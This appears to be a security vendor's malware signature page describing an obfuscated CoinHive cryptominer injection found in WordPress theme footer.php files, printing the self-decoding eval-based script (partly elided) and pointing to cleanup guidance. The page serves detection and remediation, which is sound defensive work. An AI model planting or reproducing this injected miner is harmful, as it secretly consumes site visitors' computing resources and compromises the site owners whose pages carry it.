SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware.cryptominer.11

malware.cryptominer.11

Description:
One of many obfuscated CoinHive JavaScript miner injections, which usually means that it's used without webmaster's consent. This one uses the Hivelogic Enkoder for obfuscation.

< script type="text/javascript">
//<![CDATA[
<!--
var x="function f(x​){var i,o="",l=x.length;for(i=0;i<l;i+=2) {if(i+1<l)o+=" +
"x.charAt(i+1);try{o+=x.charAt(i);}catch(e){}}return o;}f("ufcnitnof x({)av" +
" r,i=o\"\"o,=l.​xelgnhtl,o=;lhwli​(e.xhcraoCedtAl​(1/)3=!84{)rt{y+xx=l;=+;" +
"lc}tah​ce({)}}of(r=i-l;1>i0=i;--{)+ox=c.​ahAr(t)i};erutnro s.buts​(r,0lo;)f}\" +
""(1),9\"\\\\V\\​\\P\\KC3V02\\\\26\\04\\01\\\\26\\" +
"00\\00\\\\21\\0N\\\\\\\\\\21​00\\\\0/00\\\\.&05\\"+
..skipped...
"N9\\t4\\00\\\\O**421\\03\\02\\\\A900\\0%\\B636\\04\\"+
"-/00\\0\\\\\\\\Z\\31\\0>\\BP0L02\\\\27\\06\\01\\\"+
"\\\r&\\202203\\\\<t>.36\\0;\\<=21\\0q\\*'m kq,8.&e+\\6\" +
"\\"4\\4503\\\\bQ`O05\\0N\\​QIUE0F01\\\\n]lC21\\0Z\\E]IY" +
"7Z00\\\\33\\00\\03\\\\07\\0x\\HP17\\0N\​svy3smvqy~;v{q?" +
...skipped...
"\\\27\\03\\02\\\\6M02\\\\17\\05\\00\\\\+23>\\?(\""+
"}fo;n uret​}r);+)y+^(i)t(eAodrCha​.c(xdeCoarChomfrg​.intr=So+7;12%={y+)i+l;i<0" +
";i=r(foh;gten.l=x,l\"\\\"\\o=i,r va){,y(x fontincfu)\"")"         ;
while(x=eval​(x));
//-->
//]]>
< /script>

We found this code at the bottom of the active WordPress theme's footer.php file.

Affecting: Mostly WordPress sites.

Mitigation How to clean a hacked WordPress site